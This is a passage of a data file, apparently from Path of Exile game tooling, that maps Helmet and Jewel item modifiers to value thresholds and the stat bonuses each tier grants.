"Adds # to # Physical Damage against Bleeding Enemies": [(25, '(10 - 11)% increased Damage with Bleeding'), (45, '(12 - 13)% increased Damage with Bleeding'), (100, '(14 - 15)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"Adds # to # Physical Damage against Poisoned Enemies": [(25, '(10 - 11)% increased Damage with Poison'), (45, '(12 - 13)% increased Damage with Poison'), (100, '(14 - 15)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"Adds # to # Physical Damage to Attacks": [(8, '8% increased Global Physical Damage'), (16, '(9 - 10)% increased Global Physical Damage'), (24, '(11 - 12)% increased Global Physical Damage'), (28, '(13 - 14)% increased Global Physical Damage'), (50, '(15 - 16)% increased Global Physical Damage\n(6 - 10)% chance to Impale Enemies on Hit with Attacks\nCurse Enemies with Level 8 Vulnerability on Hit')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Minions Recover #% of their Life when you Focus": [(250, 'Minions Regenerate 0.3% Life per second'), (500, 'Minions Regenerate 0.5% Life per second')],
"Minions deal #% increased Damage": [(35, 'Minions deal (9 - 10)% increased Damage'), (100, 'Minions deal (11 - 12)% increased Damage')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Non-Vaal Skills deal #% increased Damage during Soul Gain Prevention": [(150, 'Vaal Skills deal (13 - 16)% increased Damage'), (500, 'Vaal Skills deal (17 - 21)% increased Damage')],
"Socketed Gems deal # to # additional Fire Damage": [(230, '(11 - 12)% increased Fire Damage'), (460, '(13 - 14)% increased Fire Damage'), (1000, '(15 - 16)% increased Fire Damage')],
"Socketed Gems deal #% more Damage over Time": [(40, '(9 - 10)% increased Damage over Time'), (70, '(11 - 12)% increased Damage over Time'), (100, '(13 - 15)% increased Damage over Time')],
"Socketed Gems have #% more Attack and Cast Speed": [(17, '3% increased Attack and Cast Speed'), (33, '4% increased Attack and Cast Speed'), (100, '5% increased Attack and Cast Speed')],
"Socketed Gems have +3.5% Critical Strike Chance": [(360, '(14 - 15)% increased Global Critical Strike Chance'), (710, '(16 - 17)% increased Global Critical Strike Chance'), (1500, '(18 - 20)% increased Global Critical Strike Chance')],
"Socketed Skills have #% increased Attack Speed": [(20, '3% increased Attack Speed'), (40, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"Socketed Skills have #% increased Cast Speed": [(20, '3% increased Cast Speed'), (40, '4% increased Cast Speed'), (100, '5% increased Cast Speed')],
"You have Onslaught during Soul Gain Prevention": [(2, '3% increased Attack Speed\n3% increased Cast Speed'), (5, '4% increased Attack Speed\n4% increased Cast Speed')],
},
"Helmet": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction while Focussed": [(30, '(-15 - -11) Physical Damage taken from Attacks'), (50, '(-20 - -16) Physical Damage taken from Attacks')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid being Frozen": [(50, '(13 - 14)% chance to Avoid being Frozen'), (110, '(15 - 17)% chance to Avoid being Frozen'), (200, '(18 - 20)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(45, '(13 - 14)% chance to Avoid being Ignited'), (90, '(15 - 17)% chance to Avoid being Ignited'), (200, '(18 - 20)% chance to Avoid being Ignited')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Shocked": [(50, '(13 - 14)% chance to Avoid being Shocked'), (110, '(15 - 17)% chance to Avoid being Shocked'), (200, '(18 - 20)% chance to Avoid being Shocked')],
"#% chance to Avoid being Stunned": [(40, '(10 - 11)% chance to Avoid being Stunned'), (80, '(12 - 13)% chance to Avoid being Stunned'), (200, '(14 - 15)% chance to Avoid being Stunned')],
"#% chance to Trigger Socketed Spells when you Focus": [(210, 'Triggered Spells deal (10 - 12)% increased Spell Damage'), (300, 'Triggered Spells deal (13 - 15)% increased Spell Damage')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to gain an additional Vaal Soul on Kill": [(11, '(2 - 3)% chance to gain an additional Vaal Soul on Kill'), (22, '(4 - 5)% chance to gain an additional Vaal Soul on Kill'), (50, '(8 - 12) to all Elemental Resistances if Corrupted')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n(10 - 15)% increased Effect of Auras on you')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\n(10 - 15)% increased Effect of Auras on you')],
"#% increased Duration of Ailments you inflict while Focussed": [(250, '(8 - 10)% increased Ignite Duration on Enemies\n(8 - 10)% increased Freeze Duration on Enemies\n(8 - 10)% increased Shock Duration on Enemies'), (500, '(12 - 15)% increased Ignite Duration on Enemies\n(12 - 15)% increased Freeze Duration on Enemies\n(12 - 15)% increased Shock Duration on Enemies')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, '(10 - 15)% increased Effect of Auras on you')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\n(10 - 15)% increased Effect of Auras on you')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\n1 to Level of Socketed Gems')],
"#% increased Mine Laying Speed": [(30, '(2 - 3)% increased Mine Laying Speed'), (100, '(4 - 5)% increased Mine Laying Speed')],
"#% increased Rarity of Items Dropped by Slain Rare or Unique Enemies": [(60, '(10 - 11)% increased Rarity of Items found'), (120, '(12 - 13)% increased Rarity of Items found'), (200, '(14 - 15)% increased Rarity of Items found')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(1 - 3)% increased Quantity of Items found')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(14 - 15)% chance to Avoid being Stunned')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Mana Regenerated per second": [(0.53, '(22 - 24)% increased Mana Regeneration Rate'), (1.07, '(25 - 27)% increased Mana Regeneration Rate'), (3.33, '(28 - 30)% increased Mana Regeneration Rate')],
"#% of Physical Damage from Hits taken as Fire Damage": [(10, '(11 - 12) to Fire Resistance'), (20, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"#% reduced Mana Reserved": [(6, 'Socketed Skill Gems get a 96% Mana Multiplier'), (12, 'Socketed Skill Gems get a 94% Mana Multiplier'), (30, 'Socketed Skill Gems get a 92% Mana Multiplier')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Armour": [(40, '(15 - 20) to Armour'), (80, '(21 - 30) to Armour'), (110, '(31 - 40) to Armour'), (150, '(41 - 55) to Armour'), (200, '(56 - 70) to Armour'), (250, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1000, '(56 - 70) to Armour\n3% additional Physical Damage Reduction')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n5% increased Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(35, '(15 - 20) to Evasion Rating'), (75, '(21 - 30) to Evasion Rating'), (105, '(31 - 40) to Evasion Rating'), (145, '(41 - 55) to Evasion Rating'), (195, '(56 - 70) to Evasion Rating'), (245, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1000, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n1 to Maximum Power Charges')],
"+# to Level of Socketed AoE Gems": [(2, '(2 - 3) to Quality of Socketed AoE Gems'), (5, '(4 - 6) to Quality of Socketed AoE Gems')],
"+# to Level of Socketed Aura Gems": [(3, '(2 - 3) to Quality of Socketed Aura Gems'), (5, '(4 - 6) to Quality of Socketed Aura Gems'), (10, '1 to Level of Socketed Aura Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Melee Gems": [(2, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems')],
"+# to Level of Socketed Minion Gems": [(2, 'Minions deal 8% increased Damage'), (4, 'Minions deal (9 - 10)% increased Damage'), (6, 'Minions deal (11 - 12)% increased Damage'), (8, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage\n1 to Level of Socketed Minion Gems')],
"+# to Level of Socketed Projectile Gems": [(2, '(2 - 3) to Quality of Socketed Projectile Gems'), (5, '(4 - 6) to Quality of Socketed Projectile Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n5% increased Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (75, '(11 - 14) to maximum Energy Shield'), (100, '(15 - 18) to maximum Energy Shield'), (125, '(19 - 23) to maximum Energy Shield'), (150, '(24 - 30) to maximum Energy Shield'), (175, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (335, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+# to maximum number of Zombies": [(1, 'Minions deal 8% increased Damage'), (2, 'Minions deal (9 - 10)% increased Damage'), (5, 'Minions deal (11 - 12)% increased Damage\nZombies deal (30 - 35)% increased Damage\nSkeletons deal (30 - 35)% increased Damage')],
"+#% chance to Dodge Attack Hits while Focussed": [(65, '1% chance to Dodge Attack Hits'), (100, '2% chance to Dodge Attack Hits')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Ignore all Movement Penalties from Armour": [(2, '4% increased Movement Speed'), (5, '(5 - 6)% increased Movement Speed')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Reflects # Physical Damage to Melee Attackers": [(10, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (20, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (30, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\n(19 - 20) to Global Critical Strike Multiplier')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Gems deal #% more Elemental Damage": [(40, '(13 - 14)% increased Elemental Damage'), (80, '(15 - 16)% increased Elemental Damage'), (150, '(17 - 19)% increased Elemental Damage')],
"Socketed Gems gain #% of Physical Damage as extra Lightning Damage": [(60, '(11 - 12)% increased Lightning Damage'), (110, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage\nGain (3 - 5)% of Physical Damage as Extra Lightning Damage')],
"Socketed Gems have #% chance to Ignite": [(60, '(9 - 10)% chance to Ignite'), (110, '(11 - 12)% chance to Ignite'), (200, '(13 - 15)% chance to Ignite\nIgnites you inflict deal Damage (7 - 10)% faster')],
"Socketed Spells have #% reduced Mana Cost": [(25, '2% reduced Mana Cost of Skills'), (50, '3% reduced Mana Cost of Skills'), (100, '(4 - 5)% reduced Mana Cost of Skills')],
},
"Jewel": {
"#% chance to Avoid interruption from Stuns while Casting": [(55, '(6 - 7)% increased Stun and Block Recovery'), (100, '(8 - 10)% chance to Avoid interruption from Stuns while Casting')],
"#% chance to Ignite": [(7, '(1 - 2)% chance to Ignite'), (50, '3% chance to Ignite')],
"#% chance to Knock Enemies Back on hit": [(12, '(2 - 3)% increased Stun Duration on Enemies'), (50, '(2 - 3)% chance to Knock Enemies Back on hit')],
"#% chance to Poison on Hit": [(8, '(1 - 2)% chance to Poison on Hit'), (50, '3% chance to Poison on Hit')],
"#% chance to Shock": [(7, '(1 - 2)% chance to Shock'), (50, '3% chance to Shock')],
"#% chance to gain Onslaught when you use a Flask": [(26, '1% increased Attack and Cast Speed'), (50, '2% increased Attack Speed\n2% increased Cast Speed')],
"#% faster start of Energy Shield Recharge": [(15, '(3 - 4) to maximum Energy Shield'), (50, '0.2% of Energy Shield Regenerated per second')],
"#% increased Area Damage": [(30, '(1 - 2)% increased Area of Effect'), (100, '(3 - 5)% increased Area of Effect')],
"#% increased Armour": [(45, '(3 - 4)% increased Armour'), (100, '(5 - 6)% increased Armour')],
"#% increased Attack Speed": [(10, '1% increased Attack Speed'), (50, '2% increased Attack Speed')],
"#% increased Attack Speed while Dual Wielding": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed while holding a Shield": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed with Axes": [(20, '(1 - 2)% increased Attack Speed with Axes'), (50, '3% increased Attack Speed with Axes')],
"#% increased Attack Speed with Bows": [(20, '(1 - 2)% increased Attack Speed with Bows'), (50, '3% increased Attack Speed with Bows')],
"#% increased Attack Speed with Claws": [(20, '(1 - 2)% increased Attack Speed with Claws'), (50, '3% increased Attack Speed with Claws')],
"#% increased Attack Speed with Daggers": [(20, '(1 - 2)% increased Attack Speed with Daggers'), (50, '3% increased Attack Speed with Daggers')],
"#% increased Attack Speed with Maces": [(20, '(1 - 2)% increased Attack Speed with Maces'), (50, '3% increased Attack Speed with Maces')],
"#% increased Attack Speed with One Handed Melee Weapons": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed with Staves": [(20, '(1 - 2)% increased Attack Speed with Staves'), (50, '3% increased Attack Speed with Staves')],
"#% increased Attack Speed with Swords": [(20, '(1 - 2)% increased Attack Speed with Swords'), (50, '3% increased Attack Speed with Swords')],
"#% increased Attack Speed with Two Handed Melee Weapons": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed with Wands": [(20, '(1 - 2)% increased Attack Speed with Wands'), (50, '3% increased Attack Speed with Wands')],
"#% increased Attack and Cast Speed": [(10, '1% increased Attack Speed\n1% increased Cast Speed'), (50, '2% increased Attack Speed\n2% increased Cast Speed')],
"#% increased Burning Damage": [(50, '(2 - 3)% increased Burning Damage'), (100, '(4 - 5)% increased Burning Damage')],
"#% increased Cast Speed": [(10, '1% increased Cast Speed'), (50, '2% increased Cast Speed')],
"#% increased Cast Speed while Dual Wielding": [(11, '(1 - 2)% increased Cast Speed while Dual Wielding'), (50, '3% increased Cast Speed while Dual Wielding')],
"#% increased Cast Speed while holding a Shield": [(11, '(1 - 2)% increased Cast Speed while holding a Shield'), (50, '3% increased Cast Speed while holding a Shield')],
"#% increased Cast Speed while wielding a Staff": [(11, '(1 - 2)% increased Cast Speed while wielding a Staff'), (50, '3% increased Cast Speed while wielding a Staff')],
"#% increased Cast Speed with Cold Skills": [(11, '(2 - 3)% increased Cold Damage'), (50, '(4 - 5)% increased Cold Damage\n2% increased Cast Speed')],
"#% increased Cast Speed with Fire Skills": [(11, '(2 - 3)% increased Fire Damage'), (50, '(4 - 5)% increased Fire Damage\n2% increased Cast Speed')],
"#% increased Cast Speed with Lightning Skills": [(11, '(2 - 3)% increased Lightning Damage'), (50, '(4 - 5)% increased Lightning Damage\n2% increased Cast Speed')],
"#% increased Chaos Damage": [(35, '(2 - 3)% increased Chaos Damage'), (100, '(4 - 5)% increased Chaos Damage')],
"#% increased Cold Damage": [(42, '(2 - 3)% increased Cold Damage'), (100, '(4 - 5)% increased Cold Damage')],
"#% increased Critical Strike Chance for Spells": [(35, '(2 - 3)% increased Spell Damage'), (100, '(4 - 5)% increased Spell Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Cold Skills": [(48, '(2 - 3)% increased Cold Damage'), (100, '(4 - 5)% increased Cold Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Elemental Skills": [(35, '(2 - 3)% increased Elemental Damage'), (100, '(4 - 5)% increased Elemental Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Fire Skills": [(48, '(2 - 3)% increased Fire Damage'), (100, '(4 - 5)% increased Fire Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Lightning Skills": [(48, '(2 - 3)% increased Lightning Damage'), (100, '(4 - 5)% increased Lightning Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with One Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Two Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Damage": [(27, '2% increased Damage'), (100, '(3 - 4)% increased Damage')],
"#% increased Damage over Time": [(32, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage with Ailments": [(50, '(2 - 3)% increased Damage with Ailments'), (100, '(4 - 5)% increased Damage with Ailments')],
"#% increased Damage with Bleeding": [(50, '(2 - 3)% increased Damage with Bleeding'), (100, '(4 - 5)% increased Damage with Bleeding')],
"#% increased Damage with Poison": [(50, '(2 - 3)% increased Damage with Poison'), (100, '(4 - 5)% increased Damage with Poison')],
"#% increased Energy Shield Recharge Rate": [(20, '(3 - 4) to maximum Energy Shield'), (50, '0.2% of Spell Damage Leeched as Energy Shield')],
"#% increased Evasion Rating": [(45, '(3 - 4)% increased Evasion Rating'), (100, '(5 - 6)% increased Evasion Rating')],
"#% increased Fire Damage": [(42, '(2 - 3)% increased Fire Damage'), (100, '(4 - 5)% increased Fire Damage')],
"#% increased Global Accuracy Rating": [(32, '(21 - 35) to Accuracy Rating'), (100, '(36 - 50) to Accuracy Rating')],
"#% increased Global Critical Strike Chance": [(30, '2% increased Global Critical Strike Chance'), (100, '(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Global Defences": [(16, '(3 - 4)% increased Armour\n(3 - 4)% increased Evasion Rating\n(3 - 4) to maximum Energy Shield'), (50, '(5 - 6)% increased Armour\n(5 - 6)% increased Evasion Rating\n(5 - 6) to maximum Energy Shield')],
"#% increased Global Physical Damage": [(42, '(2 - 3)% increased Global Physical Damage'), (100, '(4 - 5)% increased Global Physical Damage')],
"#% increased Lightning Damage": [(42, '(2 - 3)% increased Lightning Damage'), (100, '(4 - 5)% increased Lightning Damage')],
"#% increased Mana Regeneration Rate": [(35, '(2 - 3) to maximum Mana'), (100, '(5 - 7)% increased Mana Regeneration Rate')],
"#% increased Melee Critical Strike Chance": [(35, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Melee Damage": [(32, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Melee Physical Damage while holding a Shield": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
